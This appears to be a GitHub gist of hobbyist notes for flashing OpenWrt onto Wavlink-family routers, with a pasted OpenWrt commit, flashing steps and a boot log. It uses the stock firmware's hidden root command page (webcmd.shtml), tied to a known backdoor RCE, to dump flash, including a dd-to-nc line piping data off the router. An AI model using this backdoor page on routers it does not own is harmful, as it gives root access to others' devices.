Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
f for JETSTREAM AC3000 aka ERAC3000 WS-WN536A8, WS-WN533A8, ARK T6, Quantum Max, Quantum T10, Quantum T12, Quantum D4C, Quantum D4, Quantum D6Q, Quantum D6, Quantum T8, Quantum T6

Incentive to get rid of stock firmware and replace with openwrt for all these models found here

Backdoor Unauthenticated RCE – CVE-2020-10971 and CVE-2020-10972

https://james-clee.com/2020/04/18/multiple-wavlink-vulnerabilities/

This is regarding :

JETSTREAM AC3000 aka ERAC3000 WS-WN536A8, WS-WN533A8, ARK T6, Quantum Max, Quantum T10, Quantum T12, Quantum D4C, Quantum D4, Quantum D6Q, Quantum D6, Quantum T8, Quantum T6

These models essentially sahre the same stock firmware, found with basic dirty instructions here:

https://github.com/bubbadestroy/Jetstream_AC3000

That said: Below is all the steps notes on getting this thing cleaned up with a fresh clean openwrt firmware.

https://frickel.cloud/firmware/openwrt/-/commit/92780d80ab6f5f03fac2407c06eb267dd83914a1

https://frickel.cloud/firmware/openwrt/-/tree/92780d80ab6f5f03fac2407c06eb267dd83914a1/target/linux/ramips DavideFioravanti:winstars_ws-wn583a6

ramips: add support for Winstars WS-WN583A6

The Winstars WS-WN583A6 is a wireless repeater with 2 gigabit ethernet ports. Even if mine is branded as "Gemeita AC2100", the sticker on the back says WS-WN583A6. So I will refer to it as Winstars WS-WN583A6. Probably the real product name is the Wavlink WL-WN583A6 because of the many references to Wavlink in the OEM firmware and bootlog.

Hardware

SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads) RAM: 128MB FLASH: 8MB NOR (GigaDevice GD25Q64B) ETH: 2x 10/100/1000 Mbps Ethernet (MT7530) WIFI:

  • 2.4GHz: 1x MT7603E (2x2:2)
  • 5GHz: 1x MT7615E (4x4:4)
  • 6 internal antennas BTN:
  • 1x Reset button
  • 1x WPS button
  • 1x ON/OFF switch (working but unmodifiable)
  • 1x Auto/Schedule switch (working but unmodifiable. Read Note openwrt#3) LEDS:
  • 1x White led
  • 1x Red led
  • 1x Amber led
  • 1x Blue led
  • 2x Blue leds (lan and wan port status: working but unmodifiable) UART:
  • 57600-8-N-1

Everything works correctly.

Currently there is no firmware update available. Because of this, in order to restore the OEM firmware, you must firstly dump the OEM firmware from your router before you flash the OpenWrt image.

Backup the OEM Firmware

The following steps are to be intended for users having little to none experience in linux. Obviously there are many ways to backup the OEM firmware, but probably this is the easiest way for this router. Procedure tested on M83A6.V5030.191210 firmware version.

  1. Go to http://192.168.10.1/webcmd.shtml

  2. Type the following line in the "Command" input box: mkdir /etc_ro/lighttpd/www/dev; for i in /dev/mtd*ro; do dd if=${i} of=/etc_ro/lighttpd/www${i}; done

  3. Click "Apply"

  4. After few seconds, in the textarea should appear this output: 16384+0 records in 16384+0 records out 8388608 bytes (8.0MB) copied, 4.038820 seconds, 2.0MB/s 384+0 records in 384+0 records out 196608 bytes (192.0KB) copied, 0.095180 seconds, 2.0MB/s 128+0 records in 128+0 records out 65536 bytes (64.0KB) copied, 0.032020 seconds, 2.0MB/s 128+0 records in 128+0 records out 65536 bytes (64.0KB) copied, 0.031760 seconds, 2.0MB/s 15744+0 records in 15744+0 records out 8060928 bytes (7.7MB) copied, 3.885280 seconds, 2.0MB/s dd: can't open '/dev/mtd5ro': No such device dd: can't open '/dev/mtd6ro': No such device dd: can't open '/dev/mtd7ro': No such device

    Excluding the "X.XXXXXX seconds" part, you should get the same exact output. If your output doesn't match mine, stop reading and ask for help in the forum.

  5. Open the following links to download the partitions of the OEM FW: http://192.168.10.1/dev/mtd0ro http://192.168.10.1/dev/mtd1ro http://192.168.10.1/dev/mtd2ro http://192.168.10.1/dev/mtd3ro http://192.168.10.1/dev/mtd4ro

    If one (or more) of these files weight 0 byte, stop reading and ask for help in the forum.

  6. Store these downloaded files in a safe place.

  7. Reboot your router to remove any temporary file from your router.

Installation

Flash the initramfs image in the OEM firmware interface. When openwrt boots, flash the sysupgrade image otherwise you won't be able to keep configuration between reboots.

Restore OEM Firmware

Flash the "mtd4ro" file you previously backed-up directly from LUCI. Warning: Remember to not keep settings! Warning2: Remember to force the flash.

Notes

  1. The "System Command" page allows to run every command as root. For example you can use "dd" and "nc" to backup the OEM firmware. PC (SERVER): nc -l 5555 > ./mtdXro ROUTER (CLIENT): dd if=/dev/mtdXro | nc PC_IP_ADDRESS 5555

  2. The OEM web interface accepts only images containing the string "WN583A6" in the filename. Currently the OEM interface accepts only the initramfs image probably because it checks if the ih_size in the image header is equal to the whole image size (instead of the kernel size) Read more here: https://forum.openwrt.org/t/support-for-strong-1200/22768/19

  3. The white led (namely "Smart Night Light") can be controller by the user only if the side switch is set to "Schedule" otherwise it will be activated by the light condition (there is a photodiode on the top side of the router)

  4. Router mac addresses:

    LAN XX:XX:XX:XX:XX:8F WAN XX:XX:XX:XX:XX:90 WIFI 2G XX:XX:XX:XX:XX:91 WIFI 5G XX:XX:XX:XX:XX:92

    LABEL XX:XX:XX:XX:XX:91

Signed-off-by: Davide Fioravanti pantanastyle@gmail.com

winstars_ws-wn583a6 

@DavideFioravanti DavideFioravanti committed on Jul 25 1 parent 546e140 commit 7cb957abd9aeb15621b76fcdd69a415a87ca9201 Showing with 169 additions and 1 deletion. 154 target/linux/ramips/dts/mt7621_winstars_ws-wn583a6.dts @@ -0,0 +1,154 @@ // SPDX-License-Identifier: GPL-2.0-or-later OR MIT /dts-v1/;

#include "mt7621.dtsi"

#include <dt-bindings/gpio/gpio.h> #include <dt-bindings/input/input.h>

/ { compatible = "winstars,ws-wn583a6", "mediatek,mt7621-soc"; model = "Winstars WS-WN583A6";

aliases {
	led-boot = &led_status_red;
	led-failsafe = &led_status_red;
	led-running = &led_status_blue;
	led-upgrade = &led_status_red;
};

chosen {
	bootargs = "console=ttyS0,57600";
};

leds {
	compatible = "gpio-leds";

	night_light_white {
		label = "ws-wn583a6:white:night_light";
		gpios = <&gpio 15 GPIO_ACTIVE_HIGH>;
	};

	led_status_blue: status_blue {
		label = "ws-wn583a6:blue:status";
		gpios = <&gpio 22 GPIO_ACTIVE_LOW>;
	};

	status_amber {
		label = "ws-wn583a6:amber:status";
		gpios = <&gpio 24 GPIO_ACTIVE_LOW>;
	};

	led_status_red: status_red {
		label = "ws-wn583a6:red:status";
		gpios = <&gpio 25 GPIO_ACTIVE_LOW>;
	};
};

keys {
	compatible = "gpio-keys";

	reset {
		label = "reset";
		gpios = <&gpio 18 GPIO_ACTIVE_LOW>;
		linux,code = <KEY_RESTART>;
	};

	wps {
		label = "wps";
		gpios = <&gpio 13 GPIO_ACTIVE_LOW>;
		linux,code = <KEY_WPS_BUTTON>;
	};
};

};

&spi0 { status = "okay";

flash@0 {
	compatible = "jedec,spi-nor";
	reg = <0>;
	spi-max-frequency = <104000000>;
	m25p,fast-read;

	partitions {
		compatible = "fixed-partitions";
		#address-cells = <1>;
		#size-cells = <1>;

		partition@0 {
			label = "bootloader";
			reg = <0x0 0x30000>;
			read-only;
		};

		partition@30000 {
			label = "config";
			reg = <0x30000 0x10000>;
			read-only;
		};

		factory: partition@40000 {
			label = "factory";
			reg = <0x40000 0x10000>;
			read-only;
		};

		partition@50000 {
			compatible = "denx,uimage";
			label = "firmware";
			reg = <0x50000 0x7b0000>;
		};
	};
};

};

&pcie { status = "okay"; };

&pcie0 { wifi@0,0 { compatible = "mediatek,mt76"; reg = <0x0000 0 0 0 0>; mediatek,mtd-eeprom = <&factory 0x0000>; }; };

&pcie1 { wifi@0,0 { compatible = "mediatek,mt76"; reg = <0x0000 0 0 0 0>; mediatek,mtd-eeprom = <&factory 0x8000>; }; };

&gmac0 { mtd-mac-address = <&factory 0xe000>; };

&switch0 { ports { port@0 { status = "okay"; label = "wan"; mtd-mac-address = <&factory 0xe006>; };

	port@1 {
		status = "okay";
		label = "lan";
	};
};

};

&state_default { gpio { groups = "jtag", "wdt", "rgmii2"; function = "gpio"; }; };

&xhci { status = "disabled"; }; 12 target/linux/ramips/image/mt7621.mk @@ -1020,6 +1020,18 @@ define Device/wevo_w2914ns-v2 endef TARGET_DEVICES += wevo_w2914ns-v2

define Device/winstars_ws-wn583a6 $(Device/uimage-lzma-loader) IMAGE_SIZE := 7872k DEVICE_VENDOR := Winstars DEVICE_MODEL := WS-WN583A6 DEVICE_ALT0_VENDOR := Gemeita DEVICE_ALT0_MODEL := AC2100 KERNEL_INITRAMFS_SUFFIX := -WN583A6$$(KERNEL_SUFFIX) DEVICE_PACKAGES := kmod-mt7603 kmod-mt7615e kmod-mt7615-firmware wpad-basic endef TARGET_DEVICES += winstars_ws-wn583a6

define Device/xiaomi-ac2100 $(Device/uimage-lzma-loader) BLOCKSIZE := 128k 4 target/linux/ramips/mt7621/base-files/etc/board.d/02_network @@ -9,7 +9,8 @@ ramips_setup_interfaces() local board="$1"

case $board in
asiarf,ap7621-001)
asiarf,ap7621-001|\
winstars,ws-wn583a6)
	ucidef_set_interfaces_lan_wan "lan" "wan"
	;;
asiarf,ap7621-nv1|\

@@ -113,6 +114,7 @@ ramips_setup_macs() wan_mac=$label_mac lan_mac=$(macaddr_add $label_mac 1) ;; winstars,ws-wn583a6|
zbtlink,zbt-we1326|
zbtlink,zbt-wg3526-16m|
zbtlink,zbt-wg3526-32m)

https://git.openwrt.org/?p=openwrt/openwrt.git;a=commit;h=51b653de94e7e5006b5480df33d5dfd9de824cc7
# DIRTY FLASH OPENWRT on the following
Model Difference Statement: "We would like to confirm the models:
• WS-WN536A8, WS-WN533A8, ARK T6, Quantum Max, Quantum T10, Quantum T12,
• Quantum D4C, Quantum D4, Quantum D6Q, Quantum D6, Quantum T8, Quantum T6
are same in all respects. Only the model name and appearance is different.
The model WS-WN536A8 is the tested sample."
https://fccid.io/NZ3-WN536A8/Letter/Model-Difference-Statement-3975614
# Bubba finally destroy stock firmware and destroy the flash, but fix it easy with luci intact!
# Thanks everyone mentioned below and those who I don't know yet to credit.. .. So glad this got done!
# Jetstream-AC3000 # EMATIC ERAC3000 # WAVLINK # WINSTAR # WINSTARS # DLINK and more?
instructions to work for the above router Openwrt for Wavlink WL-WN531A6 ( or whatever your similiar model is )
(they are all the same)
https://openwrt.org/toh/wavlink/wavlink_wl-wn531a6
https://git.openwrt.org/?p=openwrt/openwrt.git;a=commit;h=51b653de94e7e5006b5480df33d5dfd9de824cc7
# Suggested that you backup your config and then factory reset first.
# Format a FAT32 USB and place it in the WS-WN536A8 usb
# go to the following address
192.168.10.1/webcmd.shtml
# copy and paste this
dd if=/dev/mtd4ro of=/media/sda1/firmware.bin
Backup the OEM Firmware:
-----------------------
There isn't any firmware released for the WS-WN536A8 on
the Wavlink/Winstar/Ematic web site. Reverting back to the OEM firmware is
not possible unless we have a backup of the original OEM
firmware.
The OEM firmware is stored on /dev/mtd4 ("Kernel").
1) Plug a FAT32 formatted USB flash drive into the USB port.
2) Navigate to "Setup->USB Storage". Under the "Available
Network folder" you can see part of the mount point of
the newly mounted flash drive filesystem - e.g "sda1".
The full mount point is prefixed with "/media", so in
this case the mount point becomes "/media/sda1".
3) Go to http://192.168.10.1/webcmd.shtml .
4) Type the following line in the "Command" input box:
dd if=/dev/mtd4ro of=/media/sda1/firmware.bin
5) Click "Apply"
6) After few seconds, in the text area should appear this
output:
30080+0 records in
30080+0 records out
7) Type "sync" in the "Command" input box and click "Apply".
8) At this point the OEM firmware is stored on the flash
drive as "firmware.bin". The size of the file is 15040 KB.
# Last chance to look around the old shit interface
# ls -la or whatever you want from
http://192.168.10.1/webcmd.shtml
-rwxr-xr-x 1 0 0 62384 nas.cgi
-rwxr-xr-x 1 0 0 66847 login.cgi
-rwxr-xr-x 1 0 0 18963 upload.cgi
-rwxr-xr-x 1 0 0 105596 adm.cgi
-rwxr-xr-x 1 0 0 61945 mesh.cgi
-rwxr-xr-x 1 0 0 17469 upload_settings.cgi
-rwxr-xr-x 1 0 0 1057 ExportLogs.sh
-rwxr-xr-x 1 0 0 96964 wireless.cgi
-rwxr-xr-x 1 0 0 97216 firewall.cgi
-rwxr-xr-x 1 0 0 80013 internet.cgi
-rwxr-xr-x 1 0 0 61923 touchlist_sync.cgi
-rwxr-xr-x 1 0 0 9015 live_api.cgi
-rwxr-xr-x 1 0 0 62841 upload_uboot.cgi
-rwxr-xr-x 1 0 0 551 ExportAllSettings.sh
-rwxr-xr-x 1 0 0 57950 applogin.cgi
-rwxr-xr-x 1 0 0 93639 makeRequest.cgi
-rwxr-xr-x 1 0 0 57482 ddns.cgi
## WARNING ( I had no LUCI at first, but found the work around just fine and now have luci )
Installation:
------------
* Flashing instructions (OEM web interface):
The OEM web interface accepts only files with names containing
"WN536A8". It's also impossible to flash the *-sysupgrade.bin
image, so we have to flash the *-initramfs-kernel.bin first and
use the OpenWrt's upgrade interface to write the sysupgrade
image.
1) Rename openwrt-ramips-mt7621-wavlink_wl-wn531a6-initramfs-kernel.bin
to WS-WN536A8.bin.
2) Connect your computer to the one of the LAN ports of the
router with an Ethernet cable and open http://192.168.10.1
3) Browse to Setup -> Firmware Upgrade interface.
4) Upload the (renamed) OpenWrt image - WN536A8.bin.
5) Proceed with the firmware installation and give the device
a few minutes to finish and reboot.
# I didnt have LUCI at first so..
# WARNING The next few steps are due to the original guide comming from another model (same hardware, but be warned, likely bugs) make sure to be in /tmp directory
Go to a powershell or use putty
ping 192.168.1.1
ctrl-c
ssh root@192.168.1.1
cd /temp
wget http://downloads.openwrt.org/snapshots/targets/ramips/mt7621/openwrt-ramips-mt7621-wavlink_wl-wn531a6-squashfs-sysupgrade.bin
sysupgrade openwrt-ramips-mt7621-wavlink_wl-wn531a6-squashfs-sysupgrade.bin
# and wait for some time to let it get an ip or
sync
ping 192.168.1.1
ctrl-c
ssh root@192.168.1.1
cd /temp
opkg install uhttpd uhttpd-mod-ubus libiwinfo-lua luci-base luci-app-firewall luci-mod-admin-full luci-theme-bootstrap
sync
root@OpenWrt:/# dmesg
[ 0.000000] Linux version 5.4.61 (builder@buildhost) (gcc version 8.4.0 (OpenWrt GCC 8.4.0 r14391-7f676b5ed6)) #0 SMP Sat Sep 5 13:43:16 2020
[ 0.000000] SoC Type: MediaTek MT7621 ver:1 eco:3
[ 0.000000] printk: bootconsole [early0] enabled
[ 0.000000] CPU0 revision is: 0001992f (MIPS 1004Kc)
[ 0.000000] MIPS: machine is Wavlink WL-WN531A6
[ 0.000000] Initrd not found or empty - disabling initrd
[ 0.000000] VPE topology {2} total 2
[ 0.000000] Primary instruction cache 32kB, VIPT, 4-way, linesize 32 bytes.
[ 0.000000] Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
[ 0.000000] MIPS secondary cache 256kB, 8-way, linesize 32 bytes.
[ 0.000000] Zone ranges:
[ 0.000000] Normal [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] HighMem empty
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] Initmem setup node 0 [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] On node 0 totalpages: 32768
[ 0.000000] Normal zone: 288 pages used for memmap
[ 0.000000] Normal zone: 0 pages reserved
[ 0.000000] Normal zone: 32768 pages, LIFO batch:7
[ 0.000000] percpu: Embedded 14 pages/cpu s26768 r8192 d22384 u57344
[ 0.000000] pcpu-alloc: s26768 r8192 d22384 u57344 alloc=14*4096
[ 0.000000] pcpu-alloc: [0] 0 [0] 1
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 32480
[ 0.000000] Kernel command line: console=ttyS0,57600 rootfstype=squashfs,jffs2
[ 0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes, linear)
[ 0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes, linear)
[ 0.000000] Writing ErrCtl register=00011cd0
[ 0.000000] Readback ErrCtl register=00011cd0
[ 0.000000] mem auto-init: stack:off, heap alloc:off, heap free:off
[ 0.000000] Memory: 120696K/131072K available (5929K kernel code, 207K rwdata, 1272K rodata, 1284K init, 238K bss, 10376K reserved, 0K cma-reserved, 0K highmem)
[ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=2, Nodes=1
[ 0.000000] rcu: Hierarchical RCU implementation.
[ 0.000000] rcu: RCU restricting CPUs from NR_CPUS=4 to nr_cpu_ids=2.
[ 0.000000] rcu: RCU calculated value of scheduler-enlistment delay is 25 jiffies.
[ 0.000000] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=2
[ 0.000000] NR_IRQS: 256
[ 0.000000] random: get_random_bytes called from start_kernel+0x340/0x558 with crng_init=0
[ 0.000000] CPU Clock: 880MHz
[ 0.000000] clocksource: GIC: mask: 0xffffffffffffffff max_cycles: 0xcaf478abb4, max_idle_ns: 440795247997 ns
[ 0.000000] clocksource: MIPS: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 4343773742 ns
[ 0.000009] sched_clock: 32 bits at 440MHz, resolution 2ns, wraps every 4880645118ns
[ 0.015482] Calibrating delay loop... 583.68 BogoMIPS (lpj=1167360)
[ 0.055787] pid_max: default: 32768 minimum: 301
[ 0.065106] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes, linear)
[ 0.079503] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes, linear)
[ 0.097215] rcu: Hierarchical SRCU implementation.
[ 0.107126] smp: Bringing up secondary CPUs ...
[ 0.117248] Primary instruction cache 32kB, VIPT, 4-way, linesize 32 bytes.
[ 0.117259] Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
[ 0.117270] MIPS secondary cache 256kB, 8-way, linesize 32 bytes.
[ 0.117365] CPU1 revision is: 0001992f (MIPS 1004Kc)
[ 0.144184] Synchronize counters for CPU 1: done.
[ 0.203825] smp: Brought up 1 node, 2 CPUs
[ 0.216044] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns
[ 0.235327] futex hash table entries: 512 (order: 2, 16384 bytes, linear)
[ 0.248980] pinctrl core: initialized pinctrl subsystem
[ 0.261031] NET: Registered protocol family 16
[ 0.283216] FPU Affinity set after 4688 emulations
[ 0.303527] workqueue: max_active 576 requested for napi_workq is out of range, clamping between 1 and 512
[ 0.324931] clocksource: Switched to clocksource GIC
[ 0.336599] NET: Registered protocol family 2
[ 0.346336] tcp_listen_portaddr_hash hash table entries: 512 (order: 0, 6144 bytes, linear)
[ 0.362978] TCP established hash table entries: 1024 (order: 0, 4096 bytes, linear)
[ 0.378104] TCP bind hash table entries: 1024 (order: 1, 8192 bytes, linear)
[ 0.392093] TCP: Hash tables configured (established 1024 bind 1024)
[ 0.404839] UDP hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.417738] UDP-Lite hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.431793] NET: Registered protocol family 1
[ 0.440366] PCI: CLS 0 bytes, default 32
[ 0.536915] 4 CPUs re-calibrate udelay(lpj = 1163264)
[ 0.548462] workingset: timestamp_bits=14 max_order=15 bucket_order=1
[ 0.574652] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 0.586160] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 0.609177] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 251)
[ 0.625917] mt7621_gpio 1e000600.gpio: registering 32 gpios
[ 0.637258] mt7621_gpio 1e000600.gpio: registering 32 gpios
[ 0.648545] mt7621_gpio 1e000600.gpio: registering 32 gpios
[ 0.660391] Serial: 8250/16550 driver, 16 ports, IRQ sharing enabled
[ 0.677078] printk: console [ttyS0] disabled
[ 0.685539] 1e000c00.uartlite: ttyS0 at MMIO 0x1e000c00 (irq = 15, base_baud = 3125000) is a 16550A
[ 0.703462] printk: console [ttyS0] enabled
[ 0.720015] printk: bootconsole [early0] disabled
[ 0.739571] 1e000d00.uartlite2: ttyS1 at MMIO 0x1e000d00 (irq = 16, base_baud = 3125000) is a 16550A
[ 0.761527] spi-mt7621 1e000b00.spi: sys_freq: 220000000
[ 0.773937] random: fast init done
[ 0.775041] spi-nor spi0.0: gd25q128 (16384 Kbytes)
[ 0.790539] 5 fixed-partitions partitions found on MTD device spi0.0
[ 0.803199] Creating 5 MTD partitions on "spi0.0":
[ 0.812766] 0x000000000000-0x000000030000 : "u-boot"
[ 0.824218] 0x000000030000-0x000000040000 : "config"
[ 0.835591] 0x000000040000-0x000000050000 : "factory"
[ 0.847149] 0x000000050000-0x000000f00000 : "firmware"
[ 0.859038] 2 uimage-fw partitions found on MTD device firmware
[ 0.870992] Creating 2 MTD partitions on "firmware":
[ 0.880917] 0x000000000000-0x00000025c990 : "kernel"
[ 0.892283] 0x00000025c990-0x000000eb0000 : "rootfs"
[ 0.903620] mtd: device 5 (rootfs) set to be root filesystem
[ 0.915025] 1 squashfs-split partitions found on MTD device rootfs
[ 0.927359] 0x0000005a0000-0x000000eb0000 : "rootfs_data"
[ 0.939574] 0x000000f00000-0x000001000000 : "vendor"
[ 0.951976] libphy: Fixed MDIO Bus: probed
[ 0.987417] libphy: mdio: probed
[ 0.994109] mt7530 mdio-bus:1f: MT7530 adapts as multi-chip module
[ 1.007456] mtk_soc_eth 1e100000.ethernet eth0: mediatek frame engine at 0xbe100000, irq 18
[ 1.025334] i2c-mt7621 1e000900.i2c: clock 100 kHz
[ 1.036495] mt7621-pci 1e140000.pcie: Parsing DT failed
[ 1.050030] NET: Registered protocol family 10
[ 1.060572] Segment Routing with IPv6
[ 1.068024] NET: Registered protocol family 17
[ 1.076989] bridge: filtering via arp/ip/ip6tables is no longer available by default. Update your scripts to load br_netfilter if you need this.
[ 1.103097] 8021q: 802.1Q VLAN Support v1.8
[ 1.114032] mt7530 mdio-bus:1f: MT7530 adapts as multi-chip module
[ 1.137212] libphy: dsa slave smi: probed
[ 1.145660] mt7530 mdio-bus:1f lan1 (uninitialized): PHY [dsa-0.0:00] driver [Generic PHY]
[ 1.163734] mt7530 mdio-bus:1f lan2 (uninitialized): PHY [dsa-0.0:01] driver [Generic PHY]
[ 1.181771] mt7530 mdio-bus:1f lan3 (uninitialized): PHY [dsa-0.0:02] driver [Generic PHY]
[ 1.199792] mt7530 mdio-bus:1f lan4 (uninitialized): PHY [dsa-0.0:03] driver [Generic PHY]
[ 1.217970] mt7530 mdio-bus:1f wan (uninitialized): PHY [dsa-0.0:04] driver [Generic PHY]
[ 1.235909] mt7530 mdio-bus:1f: configuring for fixed/rgmii link mode
[ 1.253556] DSA: tree 0 setup
[ 1.259829] rt2880-pinmux pinctrl: pcie is already enabled
[ 1.270787] mt7621-pci 1e140000.pcie: Error applying setting, reverse things back
[ 1.285860] mt7621-pci-phy 1e149000.pcie-phy: PHY for 0xbe149000 (dual port = 1)
[ 1.300783] mt7621-pci-phy 1e14a000.pcie-phy: PHY for 0xbe14a000 (dual port = 0)
[ 1.415396] mt7621-pci-phy 1e149000.pcie-phy: Xtal is 40MHz
[ 1.426518] mt7621-pci-phy 1e14a000.pcie-phy: Xtal is 40MHz
[ 1.537423] mt7621-pci 1e140000.pcie: pcie2 no card, disable it (RST & CLK)
[ 1.551298] mt7621-pci 1e140000.pcie: PCIE0 enabled
[ 1.561021] mt7621-pci 1e140000.pcie: PCIE1 enabled
[ 1.570747] mt7621-pci 1e140000.pcie: PCI coherence region base: 0x60000000, mask/settings: 0xf0000002
[ 1.589489] mt7621-pci 1e140000.pcie: PCI host bridge to bus 0000:00
[ 1.602175] pci_bus 0000:00: root bus resource [io 0x1e160000-0x1e16ffff]
[ 1.615880] pci_bus 0000:00: root bus resource [mem 0x60000000-0x6fffffff]
[ 1.629587] pci_bus 0000:00: root bus resource [bus 00-ff]
[ 1.640557] pci 0000:00:00.0: [0e8d:0801] type 01 class 0x060400
[ 1.652562] pci 0000:00:00.0: reg 0x10: [mem 0x00000000-0x7fffffff]
[ 1.665064] pci 0000:00:00.0: reg 0x14: [mem 0x60400000-0x6040ffff]
[ 1.677624] pci 0000:00:00.0: supports D1
[ 1.685617] pci 0000:00:00.0: PME# supported from D0 D1 D3hot
[ 1.697483] pci 0000:00:01.0: [0e8d:0801] type 01 class 0x060400
[ 1.709499] pci 0000:00:01.0: reg 0x10: [mem 0x00000000-0x7fffffff]
[ 1.721996] pci 0000:00:01.0: reg 0x14: [mem 0x60410000-0x6041ffff]
[ 1.734543] pci 0000:00:01.0: supports D1
[ 1.742535] pci 0000:00:01.0: PME# supported from D0 D1 D3hot
[ 1.755506] pci 0000:01:00.0: [14c3:7615] type 00 class 0x000280
[ 1.767545] pci 0000:01:00.0: reg 0x10: [mem 0x00000000-0x000fffff 64bit]
[ 1.781241] pci 0000:01:00.0: 2.000 Gb/s available PCIe bandwidth, limited by 2.5 GT/s x1 link at 0000:00:00.0 (capable of 4.000 Gb/s with 5 GT/s x1 link)
[ 1.810129] pci 0000:00:00.0: PCI bridge to [bus 01-ff]
[ 1.820559] pci 0000:00:00.0: bridge window [io 0x0000-0x0fff]
[ 1.832707] pci 0000:00:00.0: bridge window [mem 0x60000000-0x600fffff]
[ 1.846241] pci 0000:00:00.0: bridge window [mem 0x60100000-0x601fffff pref]
[ 1.860639] pci_bus 0000:01: busn_res: [bus 01-ff] end is updated to 01
[ 1.874051] pci 0000:02:00.0: [14c3:7615] type 00 class 0x000280
[ 1.886079] pci 0000:02:00.0: reg 0x10: [mem 0x00000000-0x000fffff 64bit]
[ 1.899783] pci 0000:02:00.0: 2.000 Gb/s available PCIe bandwidth, limited by 2.5 GT/s x1 link at 0000:00:01.0 (capable of 4.000 Gb/s with 5 GT/s x1 link)
[ 1.928629] pci 0000:00:01.0: PCI bridge to [bus 02-ff]
[ 1.939061] pci 0000:00:01.0: bridge window [io 0x0000-0x0fff]
[ 1.951208] pci 0000:00:01.0: bridge window [mem 0x60200000-0x602fffff]
[ 1.964739] pci 0000:00:01.0: bridge window [mem 0x60300000-0x603fffff pref]
[ 1.979145] pci_bus 0000:02: busn_res: [bus 02-ff] end is updated to 02
[ 1.992375] pci 0000:00:00.0: BAR 0: no space for [mem size 0x80000000]
[ 2.005562] pci 0000:00:00.0: BAR 0: failed to assign [mem size 0x80000000]
[ 2.019439] pci 0000:00:01.0: BAR 0: no space for [mem size 0x80000000]
[ 2.032630] pci 0000:00:01.0: BAR 0: failed to assign [mem size 0x80000000]
[ 2.046512] pci 0000:00:00.0: BAR 8: assigned [mem 0x60000000-0x600fffff]
[ 2.060045] pci 0000:00:00.0: BAR 9: assigned [mem 0x60100000-0x601fffff pref]
[ 2.074446] pci 0000:00:01.0: BAR 8: assigned [mem 0x60200000-0x602fffff]
[ 2.087979] pci 0000:00:01.0: BAR 9: assigned [mem 0x60300000-0x603fffff pref]
[ 2.102378] pci 0000:00:00.0: BAR 1: assigned [mem 0x60400000-0x6040ffff]
[ 2.115916] pci 0000:00:01.0: BAR 1: assigned [mem 0x60410000-0x6041ffff]
[ 2.129461] pci 0000:00:00.0: BAR 7: assigned [io 0x1e160000-0x1e160fff]
[ 2.142993] pci 0000:00:01.0: BAR 7: assigned [io 0x1e161000-0x1e161fff]
[ 2.156534] pci 0000:01:00.0: BAR 0: assigned [mem 0x60000000-0x600fffff 64bit]
[ 2.171116] pci 0000:00:00.0: PCI bridge to [bus 01]
[ 2.181016] pci 0000:00:00.0: bridge window [io 0x1e160000-0x1e160fff]
[ 2.194547] pci 0000:00:00.0: bridge window [mem 0x60000000-0x600fffff]
[ 2.208078] pci 0000:00:00.0: bridge window [mem 0x60100000-0x601fffff pref]
[ 2.222485] pci 0000:02:00.0: BAR 0: assigned [mem 0x60200000-0x602fffff 64bit]
[ 2.237073] pci 0000:00:01.0: PCI bridge to [bus 02]
[ 2.246968] pci 0000:00:01.0: bridge window [io 0x1e161000-0x1e161fff]
[ 2.260498] pci 0000:00:01.0: bridge window [mem 0x60200000-0x602fffff]
[ 2.274032] pci 0000:00:01.0: bridge window [mem 0x60300000-0x603fffff pref]
[ 2.289227] hctosys: unable to open rtc device (rtc0)
[ 2.299966] mt7530 mdio-bus:1f: Link is Up - 1Gbps/Full - flow control off
[ 2.317846] VFS: Mounted root (squashfs filesystem) readonly on device 31:5.
[ 2.336249] Freeing unused kernel memory: 1284K
[ 2.345300] This architecture does not have kernel memory protection.
[ 2.358123] Run /sbin/init as init process
[ 2.934235] init: Console is alive
[ 2.941260] init: - watchdog -
[ 3.691015] kmodloader: loading kernel modules from /etc/modules-boot.d/*
[ 3.795457] usbcore: registered new interface driver usbfs
[ 3.806556] usbcore: registered new interface driver hub
[ 3.817293] usbcore: registered new device driver usb
[ 3.837970] xhci-mtk 1e1c0000.xhci: 1e1c0000.xhci supply vbus not found, using dummy regulator
[ 3.855378] xhci-mtk 1e1c0000.xhci: 1e1c0000.xhci supply vusb33 not found, using dummy regulator
[ 3.873126] xhci-mtk 1e1c0000.xhci: xHCI Host Controller
[ 3.883742] xhci-mtk 1e1c0000.xhci: new USB bus registered, assigned bus number 1
[ 3.905075] xhci-mtk 1e1c0000.xhci: hcc params 0x01401198 hci version 0x96 quirks 0x0000000000210010
[ 3.923361] xhci-mtk 1e1c0000.xhci: irq 17, io mem 0x1e1c0000
[ 3.936085] hub 1-0:1.0: USB hub found
[ 3.943711] hub 1-0:1.0: 2 ports detected
[ 3.952415] xhci-mtk 1e1c0000.xhci: xHCI Host Controller
[ 3.963107] xhci-mtk 1e1c0000.xhci: new USB bus registered, assigned bus number 2
[ 3.978038] xhci-mtk 1e1c0000.xhci: Host supports USB 3.0 SuperSpeed
[ 3.990895] usb usb2: We don't know the algorithms for LPM for this host, disabling LPM.
[ 4.007994] hub 2-0:1.0: USB hub found
